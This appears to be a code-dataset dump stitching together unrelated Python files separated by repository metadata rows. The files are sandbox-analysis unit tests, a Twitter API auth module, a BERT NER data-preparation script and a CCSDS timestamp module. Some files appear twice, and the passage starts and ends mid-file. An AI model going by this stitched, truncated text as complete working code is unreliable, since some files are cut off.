"a": {"pid": 1, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 1, "guid": "a", "pguid": None},
"b": {"pid": 2, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 3, "guid": "b", "pguid": "a"},
"c": {"pid": 3, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 2, "guid": "c", "pguid": "a"},
"d": {"pid": 4, "ppid": 2, "image": "blah", "command_line": "blah", "timestamp": 4, "guid": "d", "pguid": "b"},
},
[
{"pid": 1, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 1, "guid": "a", "pguid": None,
"children":
[
{"pid": 3, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 2, "guid": "c", "pguid": "a",
"children": []},
{"pid": 2, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 3, "guid": "b", "pguid": "a",
"children":
[{"pid": 4, "ppid": 2, "image": "blah", "command_line": "blah", "timestamp": 4, "guid": "d", "pguid": "b",
"children": []}]},
]
},
],
),
# Four processes consisting of a grandparent-parent-parent-child relationship with non-ordered times using guids
(
{
1: {"pid": 1, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 1, "guid": None,
"pguid": None},
2: {"pid": 2, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 3, "guid": None,
"pguid": None},
3: {"pid": 3, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 2, "guid": None,
"pguid": None},
4: {"pid": 4, "ppid": 2, "image": "blah", "command_line": "blah", "timestamp": 4, "guid": None,
"pguid": None},
},
[
{"pid": 1, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 1, "guid": None,
"pguid": None,
"children":
[
{"pid": 3, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 2,
"guid": None, "pguid": None,
"children": []},
{"pid": 2, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 3,
"guid": None, "pguid": None,
"children":
[{"pid": 4, "ppid": 2, "image": "blah", "command_line": "blah", "timestamp": 4,
"guid": None, "pguid": None,
"children": []}]},
]
},
],
),
]
)
def test_convert_processes_dict_to_tree(processes_dict, expected_result):
from assemblyline_v4_service.common.dynamic_service_helper import SandboxOntology
actual_result = SandboxOntology._convert_processes_dict_to_tree(processes_dict)
assert expected_result == actual_result
@staticmethod
@pytest.mark.parametrize("artifact_list",
[
None,
[],
[{"name": "blah", "path": "blah", "description": "blah", "to_be_extracted": True}],
]
)
def test_validate_artifacts(artifact_list):
from assemblyline_v4_service.common.dynamic_service_helper import SandboxOntology, Artifact
actual_validated_artifact_list = SandboxOntology._validate_artifacts(artifact_list)
if artifact_list is None:
artifact_list = []
for index, artifact in enumerate(artifact_list):
expected_artifact = Artifact(
name=artifact["name"],
path=artifact["path"],
description=artifact["description"],
to_be_extracted=artifact["to_be_extracted"]
)
assert check_artifact_equality(expected_artifact, actual_validated_artifact_list[index])
@staticmethod
@pytest.mark.parametrize("artifact, expected_result_section_title",
[
(None, None),
({"path": "blah", "name": "blah", "description": "blah", "to_be_extracted": True}, None),
({"path": "blah", "name": "123_hollowshunter/hh_process_123_blah.exe", "description": "blah", "to_be_extracted": True}, "HollowsHunter Injected Portable Executable"),
({"path": "blah", "name": "123_hollowshunter/hh_process_123_blah.shc", "description": "blah", "to_be_extracted": True}, None),
({"path": "blah", "name": "123_hollowshunter/hh_process_123_blah.dll", "description": "blah", "to_be_extracted": True}, "HollowsHunter DLL"),
]
)
def test_handle_artifact(artifact, expected_result_section_title):
from assemblyline_v4_service.common.dynamic_service_helper import SandboxOntology, Artifact
from assemblyline_v4_service.common.result import ResultSection, Heuristic
if artifact is None:
with pytest.raises(Exception):
SandboxOntology._handle_artifact(artifact, None)
return
expected_result_section = None
if expected_result_section_title is not None:
expected_result_section = ResultSection(expected_result_section_title)
expected_result_section.add_tag("dynamic.process.file_name", artifact["path"])
if expected_result_section_title == "HollowsHunter Injected Portable Executable":
heur = Heuristic(17)
heur.add_signature_id("hollowshunter_pe")
expected_result_section.heuristic = heur
parent_result_section = ResultSection("blah")
a = Artifact(
name=artifact["name"],
path=artifact["path"],
description=artifact["description"],
to_be_extracted=artifact["to_be_extracted"]
)
SandboxOntology._handle_artifact(a, parent_result_section)
if len(parent_result_section.subsections) > 0:
actual_result_section = parent_result_section.subsections[0]
else:
actual_result_section = None
if expected_result_section is None and actual_result_section is None:
assert True
else:
assert check_section_equality(actual_result_section, expected_result_section)
@staticmethod
@pytest.mark.parametrize("process_list, signatures, expected_result",
[
(None, [], {}),
([], [], {}),
([{"pid": 1, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 1, "guid": None, "pguid": None}], [{"pid": 1, "name": "blah", "score": 1}], {1: {"pid": 1, "ppid": 1, "process_name": "blah", "process_pid": 1, "image": "blah", "command_line": "blah", "timestamp": 1, "guid": None, "pguid": None, "signatures": {"blah": 1}}}),
([{"pid": 2, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 1, "guid": None, "pguid": None}], [{"pid": 1, "name": "blah", "score": 1}], {2: {"pid": 2, "ppid": 1, "process_name": "blah", "process_pid": 2, "image": "blah", "command_line": "blah", "timestamp": 1, "guid": None, "pguid": None, "signatures": {}}}),
([{"pid": 2, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 1, "guid": "a", "pguid": None}], [{"pid": 1, "name": "blah", "score": 1}], {"a": {"pid": 2, "ppid": 1, "process_name": "blah", "process_pid": 2, "image": "blah", "command_line": "blah", "timestamp": 1, "guid": "a", "pguid": None, "signatures": {}}}),
([{"pid": 1, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 1, "guid": "a", "pguid": None}], [{"pid": 1, "name": "blah", "score": 1}], {"a": {"pid": 1, "ppid": 1, "process_name": "blah", "process_pid": 1, "image": "blah", "command_line": "blah", "timestamp": 1, "guid": "a", "pguid": None, "signatures": {"blah": 1}}}),
]
)
def test_match_signatures_to_process_events(process_list, signatures, expected_result):
from assemblyline_v4_service.common.dynamic_service_helper import SandboxOntology
o = SandboxOntology(process_list)
actual_result = o._match_signatures_to_process_events(signature_dicts=signatures)
assert actual_result == expected_result
@staticmethod
@pytest.mark.parametrize("process_list, expected_result", [(None, []), ([], [])])
def test_get_process_tree(process_list, expected_result):
from assemblyline_v4_service.common.dynamic_service_helper import SandboxOntology
o = SandboxOntology(process_list)
actual_result = o.get_process_tree()
assert actual_result == expected_result
@staticmethod
@pytest.mark.parametrize("process_list, signatures, expected_result",
[
(None, [], []),
([], [], []),
([{"pid": 1, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 1, "guid": "blah", "pguid": "blahblah"}], [{"pid": 1, "name": "blah", "score": 1}], [{"children": [], "pid": 1, "ppid": 1, "process_name": "blah", "process_pid": 1, "image": "blah", "command_line": "blah", "timestamp": 1, "guid": "blah", "pguid": "blahblah", "signatures": {"blah": 1}}]),
([{"pid": 2, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 1, "guid": "blah", "pguid": "blahblah"}], [{"pid": 1, "name": "blah", "score": 1}], [{"children": [], "pid": 2, "ppid": 1, "process_name": "blah", "process_pid": 2, "image": "blah", "command_line": "blah", "timestamp": 1, "guid": "blah", "pguid": "blahblah", "signatures": {}}]),
]
)
def test_get_process_tree_with_signatures(process_list, signatures, expected_result):
from assemblyline_v4_service.common.dynamic_service_helper import SandboxOntology
o = SandboxOntology(process_list)
actual_result = o.get_process_tree_with_signatures(signatures=signatures)
assert actual_result == expected_result
@staticmethod
@pytest.mark.parametrize("events, expected_result",
[
(None, []),
([], []),
([{"pid": 1, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 1.0, "guid": "blah", "pguid": "blah"}], [{"pid": 1, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 1.0, "guid": "blah", "pguid": "blah"}]),
([{"protocol": "blah", "src_ip": "blah", "src_port": 1, "domain": "blah", "dest_ip": "blah", "dest_port": 1, "pid": 1, "image": "blah", "timestamp": 1.0, "guid": "blah"}], [{"protocol": "blah", "src_ip": "blah", "src_port": 1, "domain": "blah", "dest_ip": "blah", "dest_port": 1, "pid": 1, "image": "blah", "timestamp": 1.0, "guid": "blah"}]),
([{"pid": 1, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 1.0, "guid": "blah", "pguid": "blah"}, {"protocol": "blah", "src_ip": "blah", "src_port": 1, "domain": "blah", "dest_ip": "blah", "dest_port": 1, "pid": 1, "image": "blah", "timestamp": 1.0, "guid": "blah"}], [{"pid": 1, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 1.0, "guid": "blah", "pguid": "blah"}, {"protocol": "blah", "src_ip": "blah", "src_port": 1, "domain": "blah", "dest_ip": "blah", "dest_port": 1, "pid": 1, "image": "blah", "timestamp": 1.0, "guid": "blah"}]),
([{"pid": 1, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 1.0, "guid": "blah", "pguid": "blah"}, {"protocol": "blah", "src_ip": "blah", "src_port": 1, "domain": "blah", "dest_ip": "blah", "dest_port": 1, "pid": 1, "image": "blah", "timestamp": 2.0, "guid": "blah"}], [{"pid": 1, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 1.0, "guid": "blah", "pguid": "blah"}, {"protocol": "blah", "src_ip": "blah", "src_port": 1, "domain": "blah", "dest_ip": "blah", "dest_port": 1, "pid": 1, "image": "blah", "timestamp": 2.0, "guid": "blah"}]),
([{"pid": 1, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 2.0, "guid": "blah", "pguid": "blah"}, {"protocol": "blah", "src_ip": "blah", "src_port": 1, "domain": "blah", "dest_ip": "blah", "dest_port": 1, "pid": 1, "image": "blah", "timestamp": 1.0, "guid": "blah"}], [{"protocol": "blah", "src_ip": "blah", "src_port": 1, "domain": "blah", "dest_ip": "blah", "dest_port": 1, "pid": 1, "image": "blah", "timestamp": 1.0, "guid": "blah"}, {"pid": 1, "ppid": 1, "image": "blah", "command_line": "blah", "timestamp": 2.0, "guid": "blah", "pguid": "blah"}]),
]
)
def test_get_events(events, expected_result):
from assemblyline_v4_service.common.dynamic_service_helper import SandboxOntology
so = SandboxOntology(events=events)
actual_result = so.get_events()
assert actual_result == expected_result
# TODO: implement this
# @staticmethod
# def test_run_signatures():
# from assemblyline_v4_service.common.dynamic_service_helper import SandboxOntology
# o = SandboxOntology()
# actual_result = o.run_signatures()
# assert actual_result is True
@staticmethod
@pytest.mark.parametrize("artifact_list, expected_result",
[
(None, None),
([], None),
([{"name": "blah", "path": "blah", "description": "blah", "to_be_extracted": True}], None),
([{"name": "blah", "path": "blah", "description": "blah", "to_be_extracted": False}], None),
]
)
def test_handle_artifacts(artifact_list, expected_result, dummy_request_class):
from assemblyline_v4_service.common.dynamic_service_helper import SandboxOntology
r = dummy_request_class()
o = SandboxOntology()
actual_result = o.handle_artifacts(artifact_list, r)
assert actual_result == expected_result
| 14,355 | 23,726 | 296 |
77ddeb03eb7a15446d85153cdcc54639ea8854ea | 435 | py | Python | _Dockerized/twitter_septellar/web/twitter.py | LukaszMalucha/Twitter-REST-API | 718c58a9e19b386ba2e6501efb36cbaf17bad421 | [
"MIT"
] | 7 | 2018-11-08T17:34:06.000Z | 2020-10-01T20:07:18.000Z | _Dockerized/twitter_septellar/web/twitter.py | LukaszMalucha/Twitter-REST-API | 718c58a9e19b386ba2e6501efb36cbaf17bad421 | [
"MIT"
] | 7 | 2020-01-28T22:36:02.000Z | 2022-02-10T00:12:32.000Z | _Dockerized/twitter_septellar/web/twitter.py | LukaszMalucha/Twitter-REST-API | 718c58a9e19b386ba2e6501efb36cbaf17bad421 | [
"MIT"
] | 3 | 2019-04-27T20:12:39.000Z | 2020-05-09T08:59:42.000Z | import os
# "env" is presumably a local module that populates the credential environment
# variables as an import side effect -- TODO confirm against the project.
import env
import tweepy
from tweepy import OAuthHandler
### Twitter Authentication
# Credentials are read from the environment; each is None if the variable is unset.
CONSUMER_KEY = os.environ.get("CONSUMER_KEY")
CONSUMER_SECRET = os.environ.get("CONSUMER_SECRET")
OAUTH_TOKEN = os.environ.get("OAUTH_TOKEN")
OAUTH_TOKEN_SECRET = os.environ.get("OAUTH_TOKEN_SECRET")
# OAuth 1.0a: the consumer pair identifies the app, the token pair the user.
auth = OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)
auth.set_access_token(OAUTH_TOKEN, OAUTH_TOKEN_SECRET)
# Module-level tweepy API client built from the authenticated handler.
twitter_api = tweepy.API(auth)
| 25.588235 | 57 | 0.813793 | import os
import env
import tweepy
from tweepy import OAuthHandler
### Twitter Authentication
# Read the four OAuth 1.0a credentials from the environment (never hard-code them).
CONSUMER_KEY = os.environ.get("CONSUMER_KEY")
CONSUMER_SECRET = os.environ.get("CONSUMER_SECRET")
OAUTH_TOKEN = os.environ.get("OAUTH_TOKEN")
OAUTH_TOKEN_SECRET = os.environ.get("OAUTH_TOKEN_SECRET")
# Build the tweepy OAuth handler and the module-level API client used by importers.
# NOTE(review): os.environ.get returns None when a variable is unset — OAuthHandler
# would then be constructed with None credentials; confirm the deployment sets all four.
auth = OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)
auth.set_access_token(OAUTH_TOKEN, OAUTH_TOKEN_SECRET)
twitter_api = tweepy.API(auth)
| 0 | 0 | 0 |
391fd98b1c6b5c4da768afbb6746a484ab01e355 | 6,545 | py | Python | bner/dataset.py | jplu/BNER | 15953c6623a15f95457f3832decdfd4593241c2a | [
"Apache-2.0"
] | 4 | 2019-04-25T12:06:29.000Z | 2021-11-26T16:45:30.000Z | bner/dataset.py | jplu/BNER | 15953c6623a15f95457f3832decdfd4593241c2a | [
"Apache-2.0"
] | 3 | 2020-09-25T18:51:52.000Z | 2022-02-09T23:32:31.000Z | bner/dataset.py | jplu/BNER | 15953c6623a15f95457f3832decdfd4593241c2a | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
import collections
import pandas as pd
import tensorflow as tf
import _pickle as pickle
from absl import logging
from transformers import BertTokenizer
LABELS = []
if __name__ == "__main__":
main()
| 32.241379 | 119 | 0.608709 | # coding=utf-8
import collections
import pandas as pd
import tensorflow as tf
import _pickle as pickle
from absl import logging
from transformers import BertTokenizer
LABELS = []
class InputExample(object):
    """One NER sentence: a list of tokens and a parallel list of labels."""

    def __init__(self, text=None, labels=None):
        # List of tokens
        self.text = text
        # List of labels, one per token (same length as ``text``)
        self.labels = labels
class InputFeatures(object):
    """BERT-ready features for one example; all four lists are padded to max_seq_length."""

    def __init__(self, input_ids, input_mask, segment_ids, label_ids):
        # WordPiece token ids
        self.input_ids = input_ids
        # 1 for real tokens, 0 for padding
        self.input_mask = input_mask
        # segment (token type) ids — single-sequence task, all zeros
        self.segment_ids = segment_ids
        # label id per token; 0 marks padding / non-initial sub-tokens
        self.label_ids = label_ids
def _load_dataset(name):
    """Parse a CoNLL-style file into a DataFrame with ``text`` and ``labels`` columns.

    Each row holds one sentence (list of words and the parallel list of labels).
    Token lines have 2 or 4 whitespace-separated fields, with the word first and
    the label last; blank lines separate sentences; ``-DOCSTART-`` lines are
    skipped. As a side effect, every label encountered is appended (deduplicated)
    to the module-level ``LABELS`` list.

    :param name: path readable by ``tf.io.gfile``
    :return: ``pd.DataFrame`` with columns ``text`` and ``labels``
    """
    dataset = {"text": [], "labels": []}
    logging.info(name + ": " + str(tf.io.gfile.exists(name)))

    def _flush(words, labels):
        # Register previously unseen labels, then record the finished sentence.
        for l in labels:
            if l not in LABELS:
                LABELS.append(l)
        dataset["text"].append(words)
        dataset["labels"].append(labels)

    with tf.io.gfile.GFile(name) as f:
        words = []
        labels = []
        for line in f:
            contents = line.strip()
            tokens = contents.split(' ')
            if contents.startswith("-DOCSTART-"):
                continue
            if len(tokens) == 2 or len(tokens) == 4:
                words.append(tokens[0])
                labels.append(tokens[-1])
            elif len(contents) == 0 and len(words) > 0:
                _flush(words, labels)
                words = []
                labels = []
        # BUG FIX: the original dropped the final sentence when the file did not
        # end with a blank line; flush any tokens still buffered after the loop.
        if words:
            _flush(words, labels)
    return pd.DataFrame.from_dict(dataset)
def load_examples(tsv_file):
    """Load *tsv_file* and wrap each sentence row in an :class:`InputExample`."""
    frame = _load_dataset(tsv_file)

    def _to_example(row):
        # One InputExample per DataFrame row (one sentence).
        return InputExample(text=row["text"], labels=row["labels"])

    return frame.apply(_to_example, axis=1)
def convert_single_example(ex_index, example, max_seq_length, tokenizer):
    """Convert one InputExample into padded BERT InputFeatures.

    Labels are mapped to ids starting at 1 (0 is reserved for padding, [CLS],
    [SEP] and non-initial WordPiece sub-tokens). The first five examples are
    logged for inspection.

    :param ex_index: position of the example (used only for logging)
    :param example: InputExample with parallel ``text``/``labels`` lists
    :param max_seq_length: fixed output length for all four feature lists
    :param tokenizer: BERT tokenizer providing tokenize/convert_tokens_to_ids
    :return: InputFeatures with all lists of length ``max_seq_length``
    """
    # Label ids start at 1; 0 is the padding / special-token id.
    label_id_map = {}
    for (i, label) in enumerate(LABELS, 1):
        label_id_map[label] = i
    text = example.text
    labels = example.labels
    tokens = []
    label_ids = []
    for word, label in zip(text, labels):
        # A word may split into several WordPieces; only the first piece keeps
        # the word's label, the rest get 0.
        tokenized_word = tokenizer.tokenize(word)
        tokens.extend(tokenized_word)
        label_ids.extend([label_id_map[label]] + [0] * (len(tokenized_word) - 1))
    # Truncate to leave room for [CLS] and [SEP].
    if len(tokens) >= max_seq_length - 2:
        tokens = tokens[0:(max_seq_length - 2)]
        label_ids = label_ids[0:(max_seq_length - 2)]
    # Add [SEP] token
    tokens.append("[SEP]")
    label_ids.append(0)
    segment_ids = [0] * len(tokens)
    # Add [CLS] token
    tokens = ["[CLS]"] + tokens
    label_ids = [0] + label_ids
    segment_ids = [0] + segment_ids
    input_ids = tokenizer.convert_tokens_to_ids(tokens)
    input_mask = [1] * len(tokens)
    # Zero-pad everything up to the fixed sequence length.
    while len(input_ids) < max_seq_length:
        input_ids.append(0)
        input_mask.append(0)
        segment_ids.append(0)
        label_ids.append(0)
    assert len(input_ids) == max_seq_length
    assert len(input_mask) == max_seq_length
    assert len(segment_ids) == max_seq_length
    assert len(label_ids) == max_seq_length
    # Log the first few examples to make the feature layout auditable.
    if ex_index < 5:
        logging.info("*** Example ***")
        logging.info("tokens: %s" % " ".join([str(x) for x in tokens]))
        logging.info("input_ids: %s" % " ".join([str(x) for x in input_ids]))
        logging.info("input_mask: %s" % " ".join([str(x) for x in input_mask]))
        logging.info("segment_ids: %s" % " ".join([str(x) for x in segment_ids]))
        logging.info("label_ids: %s" % " ".join([str(x) for x in label_ids]))
    feature = InputFeatures(
        input_ids=input_ids,
        input_mask=input_mask,
        segment_ids=segment_ids,
        label_ids=label_ids,
    )
    return feature
def file_based_convert_examples_to_features(examples, max_seq_length, tokenizer,
                                            output_file):
    """Serialize all examples as tf.train.Examples into a TFRecord file.

    :param examples: iterable of InputExample (indexable, with ``len``)
    :param max_seq_length: fixed feature length passed to convert_single_example
    :param tokenizer: BERT tokenizer
    :param output_file: destination TFRecord path
    :return: list of the raw token lists, in write order (used later for eval)
    """
    def create_int_feature(values):
        # Hoisted out of the loop: the original re-defined this closure on
        # every iteration for no benefit.
        return tf.train.Feature(int64_list=tf.train.Int64List(value=list(values)))

    writer = tf.io.TFRecordWriter(output_file)
    batch_tokens = []
    try:
        for (ex_index, example) in enumerate(examples):
            if ex_index % 5000 == 0:
                logging.info("Writing example %d of %d" % (ex_index, len(examples)))
            feature = convert_single_example(ex_index, example, max_seq_length, tokenizer)
            batch_tokens.append(example.text)
            features = collections.OrderedDict()
            features["input_ids"] = create_int_feature(feature.input_ids)
            features["input_mask"] = create_int_feature(feature.input_mask)
            features["segment_ids"] = create_int_feature(feature.segment_ids)
            features["label_ids"] = create_int_feature(feature.label_ids)
            tf_example = tf.train.Example(features=tf.train.Features(feature=features))
            writer.write(tf_example.SerializeToString())
    finally:
        # Close the writer even if conversion fails part-way, so the file
        # handle is not leaked.
        writer.close()
    return batch_tokens
def create_features(max_seq_len, tokenizer, train_tsv, test_tsv, train_tfrecord_file,
                    eval_tfrecord_file, metadata_file):
    """Build train/eval TFRecord files plus a pickled metadata file.

    Any pre-existing output files are removed first. The metadata pickle holds
    the sequence length, the global label list, the number of training
    examples, and the eval token lists.

    :param max_seq_len: fixed sequence length for all features
    :param tokenizer: BERT tokenizer
    :param train_tsv: CoNLL-format training file
    :param test_tsv: CoNLL-format evaluation file
    :param train_tfrecord_file: output path for training TFRecords
    :param eval_tfrecord_file: output path for evaluation TFRecords
    :param metadata_file: output path for the pickled metadata dict
    """
    global LABELS
    if tf.io.gfile.exists(train_tfrecord_file):
        tf.io.gfile.remove(train_tfrecord_file)
    if tf.io.gfile.exists(eval_tfrecord_file):
        tf.io.gfile.remove(eval_tfrecord_file)
    if tf.io.gfile.exists(metadata_file):
        tf.io.gfile.remove(metadata_file)
    train_input_examples = load_examples(train_tsv)
    eval_input_examples = load_examples(test_tsv)
    _ = file_based_convert_examples_to_features(train_input_examples, max_seq_len,
                                                tokenizer, train_tfrecord_file)
    batch_tokens = file_based_convert_examples_to_features(eval_input_examples,
                                                           max_seq_len,
                                                           tokenizer,
                                                           eval_tfrecord_file)
    metadata = {"max_seq_len": max_seq_len, "labels": LABELS,
                "train_number_examples": len(train_input_examples),
                "batch_tokens": batch_tokens}
    # BUG FIX: pickle writes bytes, so the file must be opened in binary mode;
    # the original "w" (text) mode makes pickle.dump fail under Python 3.
    # The matching reader must likewise open this file with "rb".
    with tf.io.gfile.GFile(metadata_file, "wb") as f:
        pickle.dump(metadata, f)
def main():
    """Build TFRecord features for the bundled CoNLL datasets with a cased mBERT tokenizer."""
    logging.set_verbosity(logging.INFO)
    # do_lower_case=False matches the cased multilingual checkpoint.
    tokenizer = BertTokenizer.from_pretrained("bert-base-multilingual-cased", do_lower_case=False)
    create_features(128, tokenizer, "../datasets/train.conll", "../datasets/test.conll", "../datasets/train.tf_record",
                    "../datasets/eval.tf_record", "../datasets/metadata.pkl")
if __name__ == "__main__":
main()
| 6,066 | 13 | 236 |
e14c526540e2050bac5913105a05f8a95d2defad | 4,511 | py | Python | spacepackets/ccsds/time.py | robamu-org/py-spacepackets | 522b021ba5690f97a4b74ae8b110762a32eb9b19 | [
"Apache-2.0"
] | null | null | null | spacepackets/ccsds/time.py | robamu-org/py-spacepackets | 522b021ba5690f97a4b74ae8b110762a32eb9b19 | [
"Apache-2.0"
] | 3 | 2021-10-05T09:29:45.000Z | 2022-02-12T15:46:43.000Z | spacepackets/ccsds/time.py | robamu-org/py-spacepackets | 522b021ba5690f97a4b74ae8b110762a32eb9b19 | [
"Apache-2.0"
] | 1 | 2022-03-04T17:25:29.000Z | 2022-03-04T17:25:29.000Z | from __future__ import annotations
import datetime
import math
import enum
import time
from abc import abstractmethod
DAYS_CCSDS_TO_UNIX = -4383
SECONDS_PER_DAY = 86400
UNIX_EPOCH = datetime.datetime.utcfromtimestamp(0)
def convert_unix_days_to_ccsds_days(unix_days: int) -> int:
"""Convert Unix days to CCSDS days
CCSDS epoch: 1958 Januar 1
Unix epoch: 1970 January 1
"""
return unix_days - DAYS_CCSDS_TO_UNIX
def convert_ccsds_days_to_unix_days(ccsds_days: int) -> int:
"""Convert CCSDS days to Unix days
CCSDS epoch: 1958 Januar 1
Unix epoch: 1970 January 1
"""
return ccsds_days + DAYS_CCSDS_TO_UNIX
def read_p_field(p_field: int) -> CcsdsTimeCodeId:
"""Read the p field and return the CCSDS Time Code ID
:param p_field:
:return:
:raise IndexError: P field has invalid value
"""
return CcsdsTimeCodeId((p_field & 0x70) >> 4)
class CdsShortTimestamp(CcsdsTimeCode):
"""Unpacks the time datafield of the TM packet. Right now, CDS Short timeformat is used,
and the size of the time stamp is expected to be seven bytes.
"""
CDS_SHORT_ID = 0b100
TIMESTAMP_SIZE = 7
@classmethod
@classmethod
@classmethod
@staticmethod
def init_from_current_time() -> CdsShortTimestamp:
"""Returns a seven byte CDS short timestamp with the current time"""
unix_days = (datetime.datetime.utcnow() - UNIX_EPOCH).days
seconds = time.time()
fraction_ms = seconds - math.floor(seconds)
days_ms = int((seconds % SECONDS_PER_DAY) * 1000 + fraction_ms)
time_packet = CdsShortTimestamp.init_from_unix_days(
unix_days=unix_days, ms_of_day=days_ms
)
return time_packet
@abstractmethod
@abstractmethod
| 31.110345 | 92 | 0.656174 | from __future__ import annotations
import datetime
import math
import enum
import time
from abc import abstractmethod
DAYS_CCSDS_TO_UNIX = -4383
SECONDS_PER_DAY = 86400
UNIX_EPOCH = datetime.datetime.utcfromtimestamp(0)
class CcsdsTimeCodeId(enum.IntEnum):
    """3-bit time-code identifier carried in bits 4-6 of a CCSDS P field."""
    NONE = 0
    # CUC: CCSDS Unsegmented time Code, CCSDS epoch variant
    CUC_CCSDS_EPOCH = 0b001
    # CUC with an agency-defined epoch
    CUC_AGENCY_EPOCH = 0b010
    # CDS: CCSDS Day Segmented time code
    CDS = 0b100
    # CCS: CCSDS Calendar Segmented time code
    CCS = 0b101
def convert_unix_days_to_ccsds_days(unix_days: int) -> int:
    """Translate a day count from the Unix epoch (1970-01-01)
    to the CCSDS epoch (1958-01-01).
    """
    ccsds_days = unix_days - DAYS_CCSDS_TO_UNIX
    return ccsds_days
def convert_ccsds_days_to_unix_days(ccsds_days: int) -> int:
    """Translate a day count from the CCSDS epoch (1958-01-01)
    to the Unix epoch (1970-01-01).
    """
    unix_days = ccsds_days + DAYS_CCSDS_TO_UNIX
    return unix_days
def read_p_field(p_field: int) -> CcsdsTimeCodeId:
    """Decode the 3-bit time-code identifier (bits 4-6) of a CCSDS P field.

    :param p_field: raw P-field octet
    :return: the corresponding CcsdsTimeCodeId member
    :raise ValueError: the extracted id is not a known CcsdsTimeCodeId value
    """
    code_id = (p_field >> 4) & 0b111
    return CcsdsTimeCodeId(code_id)
class CcsdsTimeCode:
    """Base interface for CCSDS time-code representations.

    NOTE(review): the class does not inherit from abc.ABC, so these
    @abstractmethod markers are not enforced at instantiation time — the
    default bodies below actually run if a subclass does not override them.
    """
    @abstractmethod
    def pack(self) -> bytearray:
        # Default: identify as "no time code" and produce an empty field.
        self.ccsds_id = CcsdsTimeCodeId.NONE
        return bytearray()
    @abstractmethod
    def return_unix_seconds(self) -> int:
        return 0
    @abstractmethod
    def return_time_string(self) -> str:
        return ""
class CdsShortTimestamp(CcsdsTimeCode):
    """Unpacks the time datafield of the TM packet. Right now, CDS Short timeformat is used,
    and the size of the time stamp is expected to be seven bytes.
    """
    # 3-bit CDS identifier placed into bits 4-6 of the P field
    CDS_SHORT_ID = 0b100
    # 1 P-field byte + 2 day bytes + 4 ms-of-day bytes
    TIMESTAMP_SIZE = 7
    def __init__(self, ccsds_days: int, ms_of_day: int):
        # Derive and cache the Unix representation and a human-readable string.
        self.ccsds_id = CcsdsTimeCodeId.CDS
        self.p_field = CdsShortTimestamp.CDS_SHORT_ID << 4
        # CCSDS recommends a 1958 Januar 1 epoch, which is different from the Unix epoch
        self.ccsds_days = ccsds_days
        self.unix_days = convert_ccsds_days_to_unix_days(self.ccsds_days)
        self.unix_seconds = self.unix_days * (24 * 60 * 60)
        self.ms_of_day = ms_of_day
        self.seconds_of_day = self.ms_of_day / 1000.0
        self.unix_seconds += self.seconds_of_day
        # utcfromtimestamp rejects pre-1970 (negative) values on some platforms,
        # so compute those via timedelta arithmetic instead.
        if self.unix_seconds < 0:
            date = datetime.datetime(1970, 1, 1) + datetime.timedelta(
                seconds=self.unix_seconds
            )
        else:
            date = datetime.datetime.utcfromtimestamp(self.unix_seconds)
        self.time_string = date.strftime("%Y-%m-%d %H:%M:%S.%f")
    @classmethod
    def init_from_unix_days(cls, unix_days: int, ms_of_day: int) -> CdsShortTimestamp:
        """Build a timestamp from days since the Unix epoch plus milliseconds of day."""
        return cls(
            ccsds_days=convert_unix_days_to_ccsds_days(unix_days=unix_days),
            ms_of_day=ms_of_day,
        )
    @classmethod
    def __empty(cls):
        # All-zero timestamp (CCSDS epoch start); currently unused internally.
        return cls(ccsds_days=0, ms_of_day=0)
    def pack(self) -> bytearray:
        """Serialize to the 7-byte CDS short form: P field, 16-bit days, 32-bit ms (big-endian)."""
        cds_packet = bytearray()
        cds_packet.append(self.p_field)
        cds_packet.append((self.ccsds_days & 0xFF00) >> 8)
        cds_packet.append(self.ccsds_days & 0xFF)
        cds_packet.append((self.ms_of_day & 0xFF000000) >> 24)
        cds_packet.append((self.ms_of_day & 0x00FF0000) >> 16)
        cds_packet.append((self.ms_of_day & 0x0000FF00) >> 8)
        cds_packet.append(self.ms_of_day & 0x000000FF)
        return cds_packet
    @classmethod
    def unpack(cls, time_field: bytes) -> CdsShortTimestamp:
        """Parse a 7-byte CDS short timestamp; raises ValueError if too short."""
        if len(time_field) < cls.TIMESTAMP_SIZE:
            raise ValueError
        # TODO: check ID?
        p_field = time_field[0]
        ccsds_days = (time_field[1] << 8) | (time_field[2])
        ms_of_day = (
            (time_field[3] << 24)
            | (time_field[4] << 16)
            | (time_field[5]) << 8
            | time_field[6]
        )
        return cls(ccsds_days=ccsds_days, ms_of_day=ms_of_day)
    @staticmethod
    def init_from_current_time() -> CdsShortTimestamp:
        """Returns a seven byte CDS short timestamp with the current time"""
        unix_days = (datetime.datetime.utcnow() - UNIX_EPOCH).days
        seconds = time.time()
        fraction_ms = fractional part of the current second
        # NOTE(review): adding fraction_ms (a value < 1 second) onto a
        # millisecond count looks like a unit mismatch, and utcnow()/time.time()
        # are sampled at slightly different instants — confirm intended precision.
        fraction_ms = seconds - math.floor(seconds)
        days_ms = int((seconds % SECONDS_PER_DAY) * 1000 + fraction_ms)
        time_packet = CdsShortTimestamp.init_from_unix_days(
            unix_days=unix_days, ms_of_day=days_ms
        )
        return time_packet
    @abstractmethod
